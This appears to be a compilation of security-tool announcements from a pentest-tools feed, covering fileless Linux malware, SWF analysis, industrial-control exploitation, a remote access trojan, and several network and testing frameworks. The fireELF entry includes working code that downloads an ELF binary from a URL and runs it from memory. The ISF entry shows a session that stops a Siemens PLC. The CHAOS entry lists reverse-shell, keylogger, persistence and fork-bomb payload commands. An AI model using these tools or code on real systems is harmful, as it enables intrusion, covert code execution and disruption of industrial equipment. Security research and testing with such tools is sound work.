fireELF – Fileless Linux Malware Framework

fireELF is an open-source, cross-platform fileless Linux malware framework that allows users to easily create and manage payloads. By default it comes with 'memfd_create', a new way to run Linux ELF executables completely from memory, without the binary ever touching the hard drive.

Features
- Choose and build payloads.
- Minify payloads.
- Shorten payloads by uploading the payload source to a pastebin; a very small stager compatible with Python <= 2.7 is then created, which allows for easy deployment.
- Output the created payload to a file.
- Create a payload from either a URL or a local binary.

Included payload: memfd_create
The only included payload, 'memfd_create', is based on the research of Stuart. It creates an anonymous file descriptor in memory, then uses fexecve to execute the binary directly from that file descriptor. This allows for execution completely in memory, which means that if the Linux system gets restarted, the payload will be nowhere to be found. (A standalone sketch of this technique appears at the end of this entry.)

Creating a payload
By default fireELF comes with 'memfd_create', but users can develop their own payloads. Payloads are stored in payloads/, and in order to create a valid payload you simply need to include a dictionary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictionary is below:

    desc = {"name": "test payload", "description": "new memory injection or fileless elf payload", "archs": "all", "python_vers": ">2.5"}

In addition to the 'desc' dictionary, the plugin engine requires a main function as the entry point. It is automatically passed two parameters: a boolean that, if true, means the second parameter is a URL; otherwise the second parameter is the payload data itself. An example of a simple entry point is below:

    def main(is_url, url_or_payload):
        return

If you have a method, feel free to commit a payload!

Installation
Download the dependencies by running:

    pip3 install -U -r dep.txt

fireELF is developed in Python 3.x.x.

Usage

    usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME]
                   (-u PAYLOAD_URL | -e EXECUTABLE_PATH)

    fireELF, Linux Fileless Malware Generator

    optional arguments:
      -h, --help           show this help message and exit
      -s                   Suppress Banner
      -p PAYLOAD_NAME      Name of Payload to Use
      -w PAYLOAD_FILENAME  Name of File to Write Payload to (Highly Recommended
                           if You're not Using the Paste Site Option)
      -u PAYLOAD_URL       Url of Payload to be Executed
      -e EXECUTABLE_PATH   Location of Executable

Download fireELF
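The technique itself is easy to demonstrate in isolation. Below is a minimal standalone sketch of memfd_create + fexecve, not fireELF's generated payload code; it assumes Python 3.8+ on Linux (where os.memfd_create is available natively), and the URL is a placeholder:

    # Sketch of in-memory ELF execution via an anonymous file descriptor.
    # Assumes Python 3.8+ on Linux; ELF_URL is a hypothetical placeholder.
    import os
    import urllib.request

    ELF_URL = "http://example.com/binary.elf"
    elf_bytes = urllib.request.urlopen(ELF_URL).read()

    # The anonymous file lives only in RAM; nothing is written to disk.
    fd = os.memfd_create("payload")
    os.write(fd, elf_bytes)

    # Replace the current process with the in-memory ELF via its descriptor.
    os.fexecve(fd, ["payload"], os.environ.copy())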

Link: http://feedproxy.google.com/~r/PentestTools/~3/nkiWxHsqM50/fireelf-fileless-linux-malware-framework.html

FLASHMINGO – Automatic Analysis Of SWF Files Based On Some Heuristics

Automatic analysis of SWF files based on some heuristics. Extensible via plugins.

Install
Install the Python (2.7) packages listed in requirements.txt. You can use the following command:

    pip install -r requirements.txt

If you want to use the decompilation functionality you need to install Jython. Ubuntu/Debian users can issue:

    apt install jython

Clone the project or download the zip file.

What
FLASHMINGO is an analysis framework for SWF files. The tool automatically triages suspicious Flash files and guides the further analysis process, freeing precious resources in your team. You can easily incorporate FLASHMINGO's analysis modules into your workflow.

Why
To this day forensic investigators and malware analysts must deal with suspicious SWF files. If history repeats itself, the security threat may become even bigger beyond Flash's end of life in 2020: systems will continue to support a legacy file format that is not going to be updated with security patches anymore. Automation is the best way to deal with this issue, and this is where FLASHMINGO can help you. FLASHMINGO is an analysis framework that automatically processes SWF files, enabling you to flag suspicious Flash samples and analyze them with minimal effort. It integrates into various analysis workflows as a stand-alone application or as a powerful library. Users can easily extend the tool's functionality via custom Python plugins.

How

Architecture
FLASHMINGO is designed with simplicity in mind. It reads a SWF file and creates an object (SWFObject) representing its contents and structure. Afterwards FLASHMINGO runs a series of plugins acting on this SWFObject and returning their values to the main program.

[The original post includes an ASCII-art flow diagram: a SWF FILE goes into FLASHMINGO, which builds a SWFOBJECT; PLUGIN 1..N each act on the SWFOBJECT and return their results to FLASHMINGO.]

When using FLASHMINGO as a library in your own projects, you only need to take care of two kinds of objects:
- one or many SWFObject(s), representing the sample(s)
- a Flashmingo object; this acts essentially as a harness connecting plugins and SWFObject(s)

Plugins!
FLASHMINGO plugins are stored in their own directories under... you guessed it: plugins. When a Flashmingo object is instantiated, it goes through this directory and processes all plugins' manifests. Should a manifest indicate that the plugin is active, the plugin is registered for later use. At the code level, this means that a small plugin_info dictionary is added to the plugins list.

Plugins are invoked via the run_plugin API with two arguments:
- the plugin's name
- the SWFObject instance

Optionally, most of the plugins allow you to pass your own user data. This is plugin dependent (read the documentation) and can be more easily explained with an example. The default plugin SuspiciousNames will search all constant pools for strings containing suspicious substrings (for example: 'overflow', 'spray', 'shell', etc.). There is a list of common substrings already hard-coded in the plugin so that it can be used as-is. However, you may pass a list of your own defined substrings, in this case via the names parameter. Code example:

    fm = Flashmingo()
    print fm.run_plugin('DangerousAPIs', swf=swf)
    print fm.run_plugin('SuspiciousNames', swf=swf, names=['spooky'])
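To make the two-object workflow concrete, here is a hedged end-to-end sketch. The import paths, the SWFObject constructor signature, and the two plugin names are assumptions for illustration only; check the autogenerated documentation in the docs directory for the real API:

    # Hypothetical library usage (Python 2.7, per the install notes).
    # Import paths and constructor signature are assumptions, not the
    # documented FLASHMINGO API.
    from flashmingo.Flashmingo import Flashmingo
    from flashmingo.SWFObject import SWFObject

    swf = SWFObject('sample.swf')   # parse the sample into a SWFObject
    fm = Flashmingo()               # harness connecting plugins and SWFObjects

    # Triage the sample with two of the default plugins (names assumed
    # by analogy with 'DangerousAPIs' and 'SuspiciousNames' above)
    print fm.run_plugin('SuspiciousConstants', swf=swf)
    print fm.run_plugin('SuspiciousLoops', swf=swf)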
Default plugins
FLASHMINGO ships with some useful plugins out of the box:
- binary_data
- dangerous_apis
- decompiler
- suspicious_constants
- suspicious_loops
- suspicious_names
- template :)

Extending FLASHMINGO
A template plugin is provided for easy development. Extending FLASHMINGO is rather straightforward. Follow these simple steps:
1. Copy the template
2. Edit the manifest
3. Override the run method
4. Add your custom code
You are ready to go :)

FLASHMINGO as a library

API
See the docs directory for autogenerated documentation. See FireEye's blog post for an example.

Front-ends
- Console

Create Documentation

    $ pip install sphinxcontrib-napoleon

After setting up Sphinx to build your docs, enable napoleon by adding it to the extensions list in the Sphinx conf.py file:

    extensions = ['sphinxcontrib.napoleon']

Use sphinx-apidoc to build your API documentation (this creates .rst files for Sphinx to process):

    $ sphinx-apidoc -f -o docs/source projectdir
    $ make html

That's it! :)

Download Flashmingo

Link: http://feedproxy.google.com/~r/PentestTools/~3/ACw-482_MOc/flashmingo-automatic-analysis-of-swf.html

ISF – Industrial Control System Exploitation Framework

ISF (Industrial Exploitation Framework) is an exploitation framework based on Python; it is similar to the Metasploit framework. ISF is based on the open-source project routersploit.

Read this in other languages: English, 简体中文

ICS Protocol Clients
- modbus_tcp_client (icssploit/clients/modbus_tcp_client.py): Modbus-TCP client
- wdb2_client (icssploit/clients/wdb2_client.py): WdbRPC version 2 client (VxWorks 6.x)
- s7_client (icssploit/clients/s7_client.py): s7comm client (S7 300/400 PLC)

Exploit Modules
- s7_300_400_plc_control (exploits/plcs/siemens/s7_300_400_plc_control.py): S7-300/400 PLC start/stop
- s7_1200_plc_control (exploits/plcs/siemens/s7_1200_plc_control.py): S7-1200 PLC start/stop/reset
- vxworks_rpc_dos (exploits/plcs/vxworks/vxworks_rpc_dos.py): VxWorks RPC remote DoS (CVE-2015-7599)
- quantum_140_plc_control (exploits/plcs/schneider/quantum_140_plc_control.py): Schneider Quantum 140 series PLC start/stop
- crash_qnx_inetd_tcp_service (exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py): QNX inetd TCP service DoS
- qconn_remote_exec (exploits/plcs/qnx/qconn_remote_exec.py): QNX qconn remote code execution
- profinet_set_ip (exploits/plcs/siemens/profinet_set_ip.py): Profinet DCP device IP configuration

Scanner Modules
- profinet_dcp_scan (scanners/profinet_dcp_scan.py): Profinet DCP scanner
- vxworks_6_scan (scanners/vxworks_6_scan.py): VxWorks 6.x scanner
- s7comm_scan (scanners/s7comm_scan.py): S7comm scanner
- enip_scan (scanners/enip_scan.py): EthernetIP scanner

ICS Protocol Modules (Scapy Modules)
These protocol layers can be used in other fuzzing frameworks such as Kitty, or to create your own client (see the sketch below):
- pn_dcp (icssploit/protocols/pn_dcp): Profinet DCP protocol
- modbus_tcp (icssploit/protocols/modbus_tcp): Modbus TCP protocol
- wdbrpc2 (icssploit/protocols/wdbrpc2): WDB RPC version 2 protocol
- s7comm (icssploit/protocols/s7comm.py): S7comm protocol
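For example, a bare-bones client built on the bundled Modbus TCP layer might look like the following sketch. The import path mirrors the table above, but the layer name and its default field values are assumptions; check icssploit/protocols/modbus_tcp for the real definitions:

    # Hypothetical minimal client using the bundled Scapy Modbus-TCP layer.
    # The layer name and defaults are assumptions; only the module path is
    # taken from the table above. Python 2 style, matching the framework.
    import socket
    from icssploit.protocols.modbus_tcp import ModbusTCP

    req = str(ModbusTCP())  # render the Scapy layer to on-the-wire bytes
    sock = socket.create_connection(("192.168.1.10", 502), timeout=2)
    sock.send(req)
    print(repr(sock.recv(1024)))  # raw response, to be dissected with the layer
    sock.close()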
Install

Python requirements:
- gnureadline (OSX only)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- python-nmap
- scapy (we suggest installing scapy manually, following the official documentation)

Install on Kali:

    git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py

Usage

    root@kali:~/Desktop/temp/isf# python isf.py

    [ASCII-art ICSSPLOIT banner]
                    ICS Exploitation Framework

    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0

    Exploits: 2 Scanners: 0 Creds: 13

    ICS Exploits:
        PLC: 2 ICS Switch: 0 Software: 0

    isf >

Exploits
You can use the tab key for completion:

    isf > use exploits/plcs/
    exploits/plcs/siemens/  exploits/plcs/vxworks/
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    isf (S7-300/400 PLC Control) >

Options
Display module options:

    isf (S7-300/400 PLC Control) > show options

    Target options:
       Name      Current settings     Description
       ----      ----------------     -----------
       target                         Target address e.g. 192.168.1.1
       port      102                  Target Port

    Module options:
       Name      Current settings     Description
       ----      ----------------     -----------
       slot      2                    CPU slot number.
       command   1                    Command 0:start plc, 1:stop plc.

Set options:

    isf (S7-300/400 PLC Control) > set target 192.168.70.210
    [+] {'target': '192.168.70.210'}

Run the module:

    isf (S7-300/400 PLC Control) > run
    [*] Running module...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc

Display information about the exploit:

    isf (S7-300/400 PLC Control) > show info
    Name: S7-300/400 PLC Control
    Description: Use S7comm command to start/stop plc.
    Devices:
    - Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
    Authors:
    - wenzhe zhu
    References:

Documents
- Modbus-TCP Client usage
- WDBRPCV2 Client usage
- S7comm Client usage
- SNMP_bruteforce usage
- S7 300/400 PLC password bruteforce usage
- Vxworks 6.x Scanner usage
- Profinet DCP Scanner usage
- S7comm PLC Scanner usage
- Profinet DCP Set IP module usage
- Load modules from extra folder
- How to write your own module

Download ISF

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

Pocsuite3 – An Open-Sourced Remote Vulnerability Testing Framework

pocsuite3 is an open-source remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine and many powerful features for the ultimate penetration testers and security researchers.

Features
- PoC scripts can run in attack, verify, and shell modes in different ways
- Plugin ecosystem
- Dynamic loading of PoC scripts from anywhere (local file, Redis, database, Seebug...)
- Loading of multiple targets from anywhere (CIDR, local file, Redis, database, ZoomEye, Shodan...)
- Results can be easily exported
- Dynamic patching and hooking of requests
- Usable both as a command line tool and as an importable Python package
- IPv6 support
- Global HTTP/HTTPS/SOCKS proxy support
- Simple spider API for PoC scripts to use
- Integration with Seebug (to load PoCs from the Seebug website)
- Integration with ZoomEye (to load targets from a ZoomEye dork)
- Integration with Shodan (to load targets from a Shodan dork)
- Integration with Ceye (to verify blind DNS and HTTP requests)
- Friendly debugging of PoC scripts with IDEs
- More...

Screenshots (in the original post): pocsuite3 console mode; pocsuite3 shell mode; pocsuite3 loading a PoC from Seebug; pocsuite3 loading multiple targets from ZoomEye; pocsuite3 loading multiple targets from Shodan.

Requirements
- Python 3.4+
- Works on Linux, Windows, Mac OSX, BSD

Installation
The quick way:

    $ pip install pocsuite3

Or click here to download the latest source zip package and extract it:

    $ wget https://github.com/knownsec/pocsuite3/archive/master.zip
    $ unzip master.zip

The latest version of this software is available from: http://pocsuite.org

Documentation
Documentation is available in the english docs / chinese docs directory. A sketch of a minimal PoC script follows at the end of this entry.

Download Pocsuite3
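For orientation, here is a minimal, hedged sketch of what a verify-mode PoC script typically looks like; the class attributes and target content are placeholders, and the authoritative format lives in the docs directory mentioned above:

    # Minimal PoC sketch for pocsuite3 (verify mode). Attribute values are
    # placeholders; consult the official docs for the authoritative format.
    from pocsuite3.api import POCBase, Output, register_poc, requests

    class DemoPOC(POCBase):
        vulID = '0'              # Seebug vulnerability ID, if any
        version = '1'
        author = 'example'
        name = 'Example banner-check PoC'
        appName = 'Example'
        appVersion = 'all'

        def _verify(self):
            result = {}
            # self.url holds the current target; requests is the patched
            # requests module exported by pocsuite3.api
            resp = requests.get(self.url, timeout=5)
            if resp.status_code == 200 and 'vulnerable-banner' in resp.text:
                result['VerifyInfo'] = {'URL': self.url}
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return output

        def _attack(self):
            return self._verify()

    register_poc(DemoPOC)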

Link: http://feedproxy.google.com/~r/PentestTools/~3/x6R6agm_yNE/pocsuite3-open-sourced-remote.html

CHAOS Framework v2.0 – Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allows generating payloads and controlling remote operating systems.

Features

    Feature         Windows  Mac  Linux
    Reverse Shell   X        X    X
    Download File   X        X    X
    Upload File     X        X    X
    Screenshot      X        X    X
    Keylogger       X
    Persistence     X
    Open URL        X        X    X
    Get OS Info     X        X    X
    Fork Bomb       X        X    X
    Run Hidden      X

Tested On
Kali Linux - ROLLING EDITION

How to Install

    # Install dependencies
    $ sudo apt install golang git -y

    # Get this repository
    $ go get github.com/tiagorlampert/CHAOS

    # Get external golang dependencies (ALL of them are required)
    $ go get github.com/kbinani/screenshot
    $ go get github.com/lxn/win
    $ go get github.com/matishsiao/goInfo
    $ go get golang.org/x/sys/windows

    # You may see the message "package github.com/lxn/win: build constraints
    # exclude all Go files". This occurs because these libraries target
    # Windows systems, but they are necessary to build the payload.

    # Go into the repository
    $ cd ~/go/src/github.com/tiagorlampert/CHAOS

    # Run
    $ go run main.go

How to Use

    Command on HOST     does...
    generate            Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows)
    lhost=              Specify an IP for the connection
    lport=              Specify a port for the connection
    fname=              Specify a filename for the output
    --windows           Target Windows
    --macos             Target Mac OS
    --linux             Target Linux
    listen              Listen for a new connection (e.g. listen lport=8080)
    serve               Serve files
    exit                Quit this program

    Command on TARGET    does...
    download             File download
    upload               File upload
    screenshot           Take a screenshot
    keylogger_start      Start keylogger session
    keylogger_show       Show keylogger session logs
    persistence_enable   Install at startup
    persistence_disable  Remove from startup
    getos                Get OS name
    lockscreen           Lock the OS screen
    openurl              Open the informed URL
    bomb                 Run fork bomb
    clear                Clear the screen
    back                 Close connection but keep running on target
    exit                 Close connection and exit on target

FAQ
Why does the keylogger capture all letters as uppercase?
All the letters obtained using the keylogger are uppercase. It is a known issue; if anyone knows how to fix the keylogger function using golang, please contact me or open an issue.

Why is it necessary to get and install external libraries?
To implement the screenshot function I used third-party libraries, which you can check at https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install them to generate the payload.

Contact
tiagorlampert@gmail.com

Download CHAOS

Link: http://www.kitploit.com/2019/04/chaos-framework-v20-generate-payloads.html

SMS-Stack – Framework to Provide TCP/IP-Based Characteristics to the GSM Short Message Service

SMS Stack is a framework that provides TCP/IP-like characteristics on top of the GSM Short Message Service. The framework works in multiple environments to provide full-stack integration in a service. Its main layer features techniques to control the order and the number of SMS messages for a given stream, plus a security layer using an AES + CTR cipher (see the chunking sketch at the end of this entry). You can easily implement your own protocol on top of SMS Stack and add new features to SMS-based communication between devices.

Prerequisites
You can use sms-stack in multiple environments in order to implement it in multiple scenarios.

Typescript
- Npm - https://www.npmjs.com
- Nodejs - https://nodejs.org/en/
- Typescript - https://www.typescriptlang.org/#download-links

Python
- Python 3.4 or higher - https://www.python.org/downloads/
- Pip - https://pypi.org/project/pip/

Android
- Android API 23 (6.0) or higher - https://developer.android.com/about/versions/marshmallow/android-6.0
- Android Studio + Gradle (with JUnit) - https://developer.android.com/studio/install

Usage
Simply add the framework from the repository for your environment.

Typescript:

    npm install sms-stack@1.x.x

Python:

    pip install sms-stack==0.x.x

Android (in the Gradle app file):

    implementation 'com.example.smstcplibrary:smsstack:0.x.x'

For further implementation details, please use the given wiki.

[Figure in the original post: SMS Stack scheme]

Contact
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

This software doesn't have a QA process; it is a proof of concept. If you have any problems, you can contact:
- pablo@11paths.com - Ideas Locas CDO - Telefónica
- franciscojose.ramirezvicente@telefonica.com - Ideas Locas CDO - Telefónica
- lucas.fernandezaragon@telefonica.com - Ideas Locas CDO - Telefónica

For more information please visit https://www.elevenpaths.com.

Download SDK-SMS-Stack
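The core idea of the main layer (numbered, encrypted, SMS-sized chunks) can be sketched in a few lines. This is an illustration only, not SMS Stack's actual API; it assumes the pycryptodome package and a 140-byte usable SMS payload:

    # Illustrative sketch (not SMS Stack's API): split an AES-CTR-encrypted
    # stream into numbered SMS-sized chunks. Assumes pycryptodome.
    from Crypto.Cipher import AES

    SMS_BYTES = 140          # assumed usable payload per SMS
    HEADER = 4               # 2-byte sequence number + 2-byte total count

    def to_sms_chunks(payload, key, nonce):
        ct = AES.new(key, AES.MODE_CTR, nonce=nonce).encrypt(payload)
        body = SMS_BYTES - HEADER
        total = (len(ct) + body - 1) // body
        return [seq.to_bytes(2, 'big') + total.to_bytes(2, 'big')
                + ct[seq * body:(seq + 1) * body]
                for seq in range(total)]

    chunks = to_sms_chunks(b'example stream' * 40, key=b'K' * 16, nonce=b'N' * 8)
    print(len(chunks), 'SMS messages needed')

The receiving side can reassemble the stream from the sequence headers regardless of the order in which the messages arrive, which is the TCP-like property the framework provides.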

Link: http://feedproxy.google.com/~r/PentestTools/~3/9hceL_jtpCY/sms-stack-framework-to-provided-tpcip.html

Decker – Declarative Penetration Testing Orchestration Framework

Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.

Example of a decker config file:

    // variables are pulled from the environment
    // ex: DECKER_TARGET_HOST
    // they will be available throughout the config files as var.*
    // ex: ${var.target_host}
    variable "target_host" {
      type = "string"
    }

    // resources refer to plugins
    // resources need unique names so plugins can be used more than once
    // they are declared with the form: 'resource "plugin_name" "unique_name" {}'
    // their outputs will be available to others using the form unique_name.*
    // ex: nmap.443
    resource "nmap" "nmap" {
      host = "${var.target_host}"
      plugin_enabled = "true"
    }

    resource "sslscan" "sslscan" {
      host = "${var.target_host}"
      plugin_enabled = "${nmap.443 == "open"}"
    }

Run a plugin for each item in a list:

    variable "target_host" {
      type = "string"
    }

    resource "nslookup" "nslookup" {
      dns_server = "8.8.4.4"
      host = "${var.target_host}"
    }

    resource "metasploit" "metasploit" {
      for_each = "${nslookup.ip_address}"
      exploit = "auxiliary/scanner/portscan/tcp"
      options = {
        RHOSTS = "${each.key}/32"
        INTERFACE = "eth0"
      }
    }

Complex configuration combining for_each with nested values:

    variable "target_host" {
      type = "string"
    }

    resource "nslookup" "nslookup" {
      dns_server = "8.8.4.4"
      host = "${var.target_host}"
    }

    resource "nmap" "nmap" {
      for_each = "${nslookup.ip_address}"
      host = "${each.key}"
    }

    // for each IP, check if nmap found port 25 open.
    // if yes, run metasploit's smtp_enum scanner
    resource "metasploit" "metasploit" {
      for_each = "${nslookup.ip_address}"
      exploit = "auxiliary/scanner/smtp/smtp_enum"
      options = {
        RHOSTS = "${each.key}"
      }
      plugin_enabled = "${nmap["${each.key}"].25 == "open"}"
    }

Output formats
Several output formats are available and more than one can be selected at the same time. Setting DECKER_OUTPUTS_JSON or DECKER_OUTPUTS_XML to "true" will output json and xml formatted files respectively.

Output .json files in addition to plain text:

    export DECKER_OUTPUTS_JSON="true"

Output .xml files in addition to plain text:

    export DECKER_OUTPUTS_XML="true"

Why the name decker?
My friend Courtney came to the rescue when I was struggling to come up with a name and found decker in a SciFi word glossary... and it sounded cool. "A future cracker; a software expert skilled at manipulating cyberspace, especially at circumventing security precautions."

Running an example config with docker
Two volumes are mounted:
- A directory named decker-reports where decker will output a file for each plugin executed. The file's name will be {unique_resource_name}.report.txt.
- The examples directory containing decker config files. Mounting this volume allows you to write configs locally using your favorite editor and still run them within the container.

One environment variable is passed in: DECKER_TARGET_HOST. This is referenced in the config files as ${var.target_host}. Decker loops through all environment variables named DECKER_*, stripping away the prefix and setting the rest to lowercase, as in the sketch below.
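That prefix-stripping rule is easy to picture with a few lines of Python (an illustration of the naming convention only, not Decker's Go implementation):

    # Illustration of Decker's env-to-variable naming rule described above.
    import os

    decker_vars = {
        name[len('DECKER_'):].lower(): value
        for name, value in os.environ.items()
        if name.startswith('DECKER_')
    }
    # DECKER_TARGET_HOST=example.com  ->  decker_vars['target_host']
    print(decker_vars.get('target_host'))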
    docker run -it --rm \
      -v "$(pwd)/decker-reports/":/tmp/reports/ \
      -v "$(pwd)/examples/":/decker-config/ \
      -e DECKER_TARGET_HOST=example.com \
      stevenaldinger/decker:kali decker ./decker-config/example.hcl

When decker finishes running the config, look in ./decker-reports for the outputs.

Running an example config without docker
You'll likely want to set the directory decker writes reports to with the DECKER_REPORTS_DIR environment variable. Something like this would be appropriate; just make sure whatever you set it to is an existing directory:

    export DECKER_REPORTS_DIR="$HOME/decker-reports"

You'll also need to set a target host if you're running one of the example config files:

    export DECKER_TARGET_HOST=""

Then just run a config file. Change to the root directory of this repo and run:

    ./decker ./examples/example.hcl

Contributing
Contributions are very welcome and appreciated. See docs/contributions.md for guidelines.

Development
Using docker for development is recommended for a smooth experience. This ensures all dependencies will be installed and ready to go. Refer to Directory Structure below for an overview of the go code.

Quick Start
1. (on host machine): make docker_build
2. (on host machine): make docker_run (will start the docker container and open an interactive bash session)
3. (inside container): dep ensure -v
4. (inside container): make build_all
5. (inside container): make run

Initialize git hooks
Run make init to add a pre-commit script that will run linting and tests on each commit.

Plugin Development
Decker itself is just a framework that reads config files, determines dependencies in the config files, and runs plugins in an order that ensures plugins with dependencies on other plugins (the output of one plugin being an input for another) run after the ones they depend on.

The real power of decker comes from plugins. Developing a plugin can be as simple or as complex as you want it to be, as long as the end result is a .so file containing the compiled plugin code and an .hcl file in the same directory declaring the inputs the plugin expects a user to configure.

The recommended way to get started with decker plugin development is by cloning the decker-plugin repository and following the steps in its documentation. It should only take you a few minutes to get a "Hello World" decker plugin running.

Installing plugins
By default, plugins are expected to be in a directory relative to wherever the decker binary is, at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.so. Additional paths can be added by setting the DECKER_PLUGIN_DIRS environment variable. The default plugin path will still be used if DECKER_PLUGIN_DIRS is set.

Example:

    export DECKER_PLUGIN_DIRS="/path/to/my/plugins:/additional/path/to/plugins"

There should be an HCL file next to the .so file at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.hcl that defines its inputs and outputs. Currently, only string, list, and map inputs are supported.
Each input should have an input block that looks like this:

    input "my_input" {
      type = "string"
      default = "some default value"
    }

Directory Structure

    .
    ├── build
    │   ├── ci/
    │   └── package/
    ├── cmd
    │   ├── decker
    │   │   └── main.go
    │   └── README.md
    ├── deployments/
    ├── docs/
    ├── examples
    │   └── example.hcl
    ├── githooks
    │   └── pre-commit
    ├── Gopkg.toml
    ├── internal
    │   ├── app
    │   │   └── decker
    │   │       └── plugins
    │   │           ├── a2sv
    │   │           │   ├── a2sv.hcl
    │   │           │   ├── main.go
    │   │           │   └── README.md
    │   │           └── ...
    │   │               ├── main.go
    │   │               ├── README.md
    │   │               └── xxx.hcl
    │   ├── pkg
    │   │   ├── dependencies/
    │   │   ├── gocty/
    │   │   ├── hcl/
    │   │   ├── paths/
    │   │   ├── plugins/
    │   │   └── reports/
    │   └── README.md
    ├── LICENSE
    ├── Makefile
    ├── README.md
    └── scripts
        ├── build-plugins.sh
        └── README.md

cmd/decker/main.go is the driver. Its job is to parse a given config file, load the appropriate plugins based on the file's resource blocks, and run the plugins with the specified inputs.

examples has a couple of example configurations to get you started with decker. If you use the kali docker image (stevenaldinger/decker:kali), all dependencies should be installed for all config files and things should run smoothly.

internal/pkg is where most of the actual code is. It contains all the packages imported by main.go:
- dependencies is responsible for building the plugin dependency graph and returning a topologically sorted array that ensures plugins are run in a working order.
- gocty offers helpers for encoding and decoding go-cty values, which are used to handle dynamic input types.
- hcl is responsible for parsing HCL files, including creating evaluation contexts that let blocks properly decode when they depend on other plugin blocks.
- paths is responsible for returning file paths for the decker binary, config files, plugin config files, and generated reports.
- plugins is responsible for determining whether plugins are enabled and for running them.
- reports is responsible for writing reports to the file system.

internal/app/decker/plugins are modular pieces of code written as Golang plugins, implementing a simple interface that allows them to be loaded and called at run-time with inputs and outputs specified in the plugin's config file (also in HCL). An example can be found at internal/app/decker/plugins/nslookup/nslookup.hcl.

decker config files offer a declarative way to write penetration tests. The manifests are written in HashiCorp Configuration Language 2 and describe the set of plugins to be used in the test as well as their inputs.

Download Decker

Link: http://feedproxy.google.com/~r/PentestTools/~3/v-JzhQO-i2Q/decker-declarative-penetration-testing.html

PFQ – Functional Network Framework For Multi-Core Architectures

PFQ is a functional framework designed for the Linux operating system, built for efficient packet capture/transmission (10G, 40G and beyond), in-kernel functional processing, kernel-bypass, and packet steering across groups of sockets/end-points. It is highly optimized for multi-core architectures, as well as for network devices equipped with multiple hardware queues. Compliant with any NIC, it provides a script that generates accelerated network device drivers starting from their source code.

PFQ enables the development of high-performance network applications, and it is shipped with a custom version of libpcap that accelerates and parallelizes legacy applications. Besides, a pure functional language designed for early stages of in-kernel packet processing is included: pfq-lang. Pfq-lang is inspired by Haskell and is intended to define applications that run on top of network device drivers. Through pfq-lang it is possible to build efficient bridges, port mirrors, simple firewalls, network balancers and so forth.

The framework includes the source code of the PFQ kernel module, user-space libraries for C, C++11-14 and the Haskell language, an accelerated pcap library, an implementation of pfq-lang as an eDSL for C++/Haskell, an experimental pfq-lang compiler, and a set of diagnostic tools.

Features
- Data-path with full lock-free architecture.
- Preallocated pools of socket buffers.
- Compliant with a plethora of network device drivers.
- Rx and Tx line-rate on 10-Gbit links (14.8 Mpps), tested with Intel ixgbe vanilla drivers.
- Transparent support of kernel threads for asynchronous packet transmission.
- Transmission with active timestamping.
- Groups of sockets which enable concurrent monitoring of multiple multi-threaded applications.
- Per-group packet steering through randomized hashing or deterministic classification.
- Per-group Berkeley and VLAN filters.
- User-space libraries for C, C++11-14 and the Haskell language.
- Functional engine for in-kernel packet processing with pfq-lang.
- pfq-lang eDSL for C++11-14 and the Haskell language.
- pfq-lang compiler used to parse and compile pfq-lang programs.
- Accelerated pcap library for legacy applications (line-speed tested with captop).
- I/O user<->kernel memory-mapped communications allocated on top of HugePages.
- pfqd daemon used to configure and parallelize (pcap) legacy applications.
- pfq-omatic script that automatically accelerates vanilla drivers.

Publications
- "PFQ: a Novel Engine for Multi-Gigabit Packet Capturing With Multi-Core Commodity Hardware": Best Paper Award at PAM 2012 (paper available from here).
- "A Purely Functional Approach to Packet Processing": ANCS 2014 Conference (October 2014, Marina del Rey).
- "Network Traffic Processing with PFQ": JSAC-SI-MT/IEEE journal, Special Issue on Measuring and Troubleshooting the Internet (March 2016).
- "Enabling Packet Fan-Out in the libpcap Library for Parallel Traffic Processing": Network Traffic Measurement and Analysis Conference (TMA 2017).
- "A Pipeline Functional Language for Stateful Packet Processing": IEEE International Workshop on NEtwork Accelerated FunctIOns (NEAF-IO '17).
- "The Acceleration of OfSoftSwitch": IEEE Conference on Network Function Virtualization and Software Defined Networks (NFV-SDN '17).

Invited talks
- "Functional Network Programming" at the Tyrrhenian International Workshop on Digital Communication (Sep. 2016).
- "Software Accelerations for Network Applications" at the NetV IRISA / Technicolor Workshop on Network Virtualization (Feb. 2017).

Author
Nicola Bonelli nicola@pfq.io

Contributors (in chronological order)
- Andrea Di Pietro andrea.dipietro@for.unipi.it
- Loris Gazzarrini loris.gazzarrini@iet.unipi.it
- Gregorio Procissi g.procissi@iet.unipi.it
- Giacomo Volpi volpi.gia@gmail.com
- Luca Abeni abeni@dit.unitn.it
- Tolysz tolysz@gmail.com
- LSB leebutterman@gmail.com
- Andrey Korolyov andrey@xdel.ru
- MrClick valerio.click@gmx.com
- Paul Emmerich emmericp@net.in.tum.de
